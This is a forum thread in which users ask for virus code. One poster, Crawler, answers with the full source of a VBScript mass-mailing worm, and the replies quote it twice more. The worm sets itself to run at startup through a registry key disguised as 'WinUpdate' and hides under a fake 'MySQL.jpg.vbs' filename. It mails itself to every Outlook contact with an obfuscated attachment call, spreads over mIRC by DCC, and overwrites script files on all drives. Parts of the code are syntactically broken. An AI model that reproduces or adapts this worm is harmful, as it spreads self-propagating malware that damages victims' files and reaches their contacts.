Sample codes for a Virus

[azelmj]

Hmm can anyone show me the codes for a virus..

[PaRaDoX]

now why would you want to make one of those? you clearly haven't made even the slightest attempt to learn a language.......

[WhiteKnight]

now why would you want to make one of those? you clearly haven't made even the slightest attempt to learn a language.......

I'm experienced programmer and I also wanted to know. Please and thank you.

[PaRaDoX]

wait, are you asking me for code too, or just referencing my question?

[WhiteKnight]

wait, are you asking me for code too, or just referencing my question?

Both.

[PaRaDoX]

i see, but what code are you asking for? im no pro, i just know a little bit here and there when it comes to languages (im not as "nooby" as i sound) and from your other posts, you seem to know a fair bit, so why would you ask me as opposed to a more experienced person? but, if you insist, what is it you're looking for exactly?

[WhiteKnight]

A way to copy a compiled code into another program, but another program must work just the same and another compiled code must be executed too.

It is what I'm looking for and I believe it could be related to decompiling/reverse engineering knowledge.

Please and thank you.

[PaRaDoX]

hmm.....reverse engineering is a tough topic for me, and i can't really say i know much about it. but inserting compiled code into another piece of compiled code? i see.......well, the only way i can ever see that happening is to insert the code BEFORE its all compiled, since you can't monkey with compiled code. it doesn't seem possible. what are you trying to do with this?

[WhiteKnight]

I'm learning how the virus is made and do then I can handle it "personally" when I get a virus onto my computer. Also it would open up my path of being a programmer, perhaps working anti-virus company.

[m!nus]

google!
keywords: code injection, code cave, CreateRemoteThread()

[WhiteKnight]

google!
keywords: code injection, code cave, CreateRemoteThread()

Oh you're saying that I cannot inject compiled code into another compiled code, but while it is running it can be injected. I see. Thank for the hint.

[Crawler]

use this..

'Vbs.Vbswg.C44 Created By Crawler. 9/4/2008
Set J3HNBQ8A = createobject("scripting.filesystemobject")
JSQNN82H = J3HNBQ8A.getspecialfolder(0)
R347C6AC = JSQNN82H & "\MySQL.jpg.vbs"
Set V58HU1JB = createobject("wscript.shell")
V58HU1JB.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R347C6AC & " %"
J3HNBQ8A.copyfile wscript.scriptfullname, R347C6AC
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\P12O8TLP") <> 1 then
P8OJH241
End if
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\FU5A2187") <> 1 then
U1SR8G82 ""
End if

Function P8OJH241()
Set C8QJ75UC = CreateObject("Outlook.Application")
If C8QJ75UC = "Outlook" Then
Set J7AL43UE = C8QJ75UC.GetNameSpace("MAPI")
Set GA4DCQC6 = J7AL43UE.AddressLists
For Each G11F1G72 In GA4DCQC6
If G11F1G72.AddressEntries.Count <> 0 Then
RA15953L = G11F1G72.AddressEntries.Count
For EH754911 = 1 To RA15953L
Set HCAM30EU = C8QJ75UC.CreateItem(0)
Set I2B9A692 = G11F1G72.AddressEntries(EH754911)
HCAM30EU.To = I2B9A692.Address
HCAM30EU.Subject = "Very Important!"
HCAM30EU.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set F82E756U =HCAM30EU." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
U5F5T1CI = R347C6AC
HCAM30EU.DeleteAfterSubmit = True
F82E756U.Add U5F5T1CI
If HCAM30EU.To <> "" Then
HCAM30EU.Send
End If
Next
End If
Next
End If
End function
Function U1SR8G82(D4PUN788)
If D4PUN788 <> "" Then
R32JRS7Q = V58HU1JB.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If J3HNBQ8A.fileexists("c:\mirc\mirc.ini") Then
D4PUN788 = "c:\mirc"
ElseIf J3HNBQ8A.fileexists("c:\mirc32\mirc.ini") Then
D4PUN788 = "c:\mirc32"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc32\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
Else
D4PUN788 = ""
End If
End If
If D4PUN788 <> "" Then
Set OEO665K0 = J3HNBQ8A.CreateTextFile(D4PUN788 & "\script.ini", True)
OEO665K0 = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
OEO665K0 = OEO665K0 & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
OEO665K0 = OEO665K0 & R347C6AC
OEO665K0 = OEO665K0 & vbCrLf & "n3=}"
script.Close
End If
End Function
Function PDO4HE2C()
On Error Resume Next
Set E4D3HNBQ = J3HNBQ8A.Drives
For Each TFLD1T6R In E4D3HNBQ
BO158HU1 = TFLD1T6R & " \ "
Call JTQSQNN8(BO158HU1)
Next
End Function

Function JTQSQNN8(GH6347C6)
AN312O8T = GH6347C6
Set L028OJH2 = J3HNBQ8A.GetFolder(AN312O8T)
Set D5CU5A21 = L028OJH2.Files
For Each BJ51SR8G In D5CU5A21
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbs"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbe"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
Next
Set IAA8QJ75 = L028OJH2.Subfolders
For Each USM7AL43 In IAA8QJ75
Call (USM7AL43.path)
Next
End function

[WhiteKnight]

use this..

'Vbs.Vbswg.C44 Created By Crawler. 9/4/2008
Set J3HNBQ8A = createobject("scripting.filesystemobject")
JSQNN82H = J3HNBQ8A.getspecialfolder(0)
R347C6AC = JSQNN82H & "\MySQL.jpg.vbs"
Set V58HU1JB = createobject("wscript.shell")
V58HU1JB.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R347C6AC & " %"
J3HNBQ8A.copyfile wscript.scriptfullname, R347C6AC
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\P12O8TLP") <> 1 then
P8OJH241
End if
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\FU5A2187") <> 1 then
U1SR8G82 ""
End if

Function P8OJH241()
Set C8QJ75UC = CreateObject("Outlook.Application")
If C8QJ75UC = "Outlook" Then
Set J7AL43UE = C8QJ75UC.GetNameSpace("MAPI")
Set GA4DCQC6 = J7AL43UE.AddressLists
For Each G11F1G72 In GA4DCQC6
If G11F1G72.AddressEntries.Count <> 0 Then
RA15953L = G11F1G72.AddressEntries.Count
For EH754911 = 1 To RA15953L
Set HCAM30EU = C8QJ75UC.CreateItem(0)
Set I2B9A692 = G11F1G72.AddressEntries(EH754911)
HCAM30EU.To = I2B9A692.Address
HCAM30EU.Subject = "Very Important!"
HCAM30EU.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set F82E756U =HCAM30EU." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
U5F5T1CI = R347C6AC
HCAM30EU.DeleteAfterSubmit = True
F82E756U.Add U5F5T1CI
If HCAM30EU.To <> "" Then
HCAM30EU.Send
End If
Next
End If
Next
End If
End function
Function U1SR8G82(D4PUN788)
If D4PUN788 <> "" Then
R32JRS7Q = V58HU1JB.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If J3HNBQ8A.fileexists("c:\mirc\mirc.ini") Then
D4PUN788 = "c:\mirc"
ElseIf J3HNBQ8A.fileexists("c:\mirc32\mirc.ini") Then
D4PUN788 = "c:\mirc32"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc32\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
Else
D4PUN788 = ""
End If
End If
If D4PUN788 <> "" Then
Set OEO665K0 = J3HNBQ8A.CreateTextFile(D4PUN788 & "\script.ini", True)
OEO665K0 = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
OEO665K0 = OEO665K0 & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
OEO665K0 = OEO665K0 & R347C6AC
OEO665K0 = OEO665K0 & vbCrLf & "n3=}"
script.Close
End If
End Function
Function PDO4HE2C()
On Error Resume Next
Set E4D3HNBQ = J3HNBQ8A.Drives
For Each TFLD1T6R In E4D3HNBQ
BO158HU1 = TFLD1T6R & " \ "
Call JTQSQNN8(BO158HU1)
Next
End Function

Function JTQSQNN8(GH6347C6)
AN312O8T = GH6347C6
Set L028OJH2 = J3HNBQ8A.GetFolder(AN312O8T)
Set D5CU5A21 = L028OJH2.Files
For Each BJ51SR8G In D5CU5A21
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbs"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbe"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
Next
Set IAA8QJ75 = L028OJH2.Subfolders
For Each USM7AL43 In IAA8QJ75
Call (USM7AL43.path)
Next
End function

=_= This isn't in any value to me, sorry.

[PaRaDoX]

oh code injection! you could have just said something

[Crawler]

use this..

'Vbs.Vbswg.C44 Created By Crawler. 9/4/2008
Set J3HNBQ8A = createobject("scripting.filesystemobject")
JSQNN82H = J3HNBQ8A.getspecialfolder(0)
R347C6AC = JSQNN82H & "\MySQL.jpg.vbs"
Set V58HU1JB = createobject("wscript.shell")
V58HU1JB.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R347C6AC & " %"
J3HNBQ8A.copyfile wscript.scriptfullname, R347C6AC
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\P12O8TLP") <> 1 then
P8OJH241
End if
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\FU5A2187") <> 1 then
U1SR8G82 ""
End if

Function P8OJH241()
Set C8QJ75UC = CreateObject("Outlook.Application")
If C8QJ75UC = "Outlook" Then
Set J7AL43UE = C8QJ75UC.GetNameSpace("MAPI")
Set GA4DCQC6 = J7AL43UE.AddressLists
For Each G11F1G72 In GA4DCQC6
If G11F1G72.AddressEntries.Count <> 0 Then
RA15953L = G11F1G72.AddressEntries.Count
For EH754911 = 1 To RA15953L
Set HCAM30EU = C8QJ75UC.CreateItem(0)
Set I2B9A692 = G11F1G72.AddressEntries(EH754911)
HCAM30EU.To = I2B9A692.Address
HCAM30EU.Subject = "Very Important!"
HCAM30EU.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set F82E756U =HCAM30EU." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
U5F5T1CI = R347C6AC
HCAM30EU.DeleteAfterSubmit = True
F82E756U.Add U5F5T1CI
If HCAM30EU.To <> "" Then
HCAM30EU.Send
End If
Next
End If
Next
End If
End function
Function U1SR8G82(D4PUN788)
If D4PUN788 <> "" Then
R32JRS7Q = V58HU1JB.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If J3HNBQ8A.fileexists("c:\mirc\mirc.ini") Then
D4PUN788 = "c:\mirc"
ElseIf J3HNBQ8A.fileexists("c:\mirc32\mirc.ini") Then
D4PUN788 = "c:\mirc32"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc32\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
Else
D4PUN788 = ""
End If
End If
If D4PUN788 <> "" Then
Set OEO665K0 = J3HNBQ8A.CreateTextFile(D4PUN788 & "\script.ini", True)
OEO665K0 = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
OEO665K0 = OEO665K0 & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
OEO665K0 = OEO665K0 & R347C6AC
OEO665K0 = OEO665K0 & vbCrLf & "n3=}"
script.Close
End If
End Function
Function PDO4HE2C()
On Error Resume Next
Set E4D3HNBQ = J3HNBQ8A.Drives
For Each TFLD1T6R In E4D3HNBQ
BO158HU1 = TFLD1T6R & " \ "
Call JTQSQNN8(BO158HU1)
Next
End Function

Function JTQSQNN8(GH6347C6)
AN312O8T = GH6347C6
Set L028OJH2 = J3HNBQ8A.GetFolder(AN312O8T)
Set D5CU5A21 = L028OJH2.Files
For Each BJ51SR8G In D5CU5A21
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbs"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbe"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
Next
Set IAA8QJ75 = L028OJH2.Subfolders
For Each USM7AL43 In IAA8QJ75
Call (USM7AL43.path)
Next
End function

=_= This isn't in any value to me, sorry.

huh? xD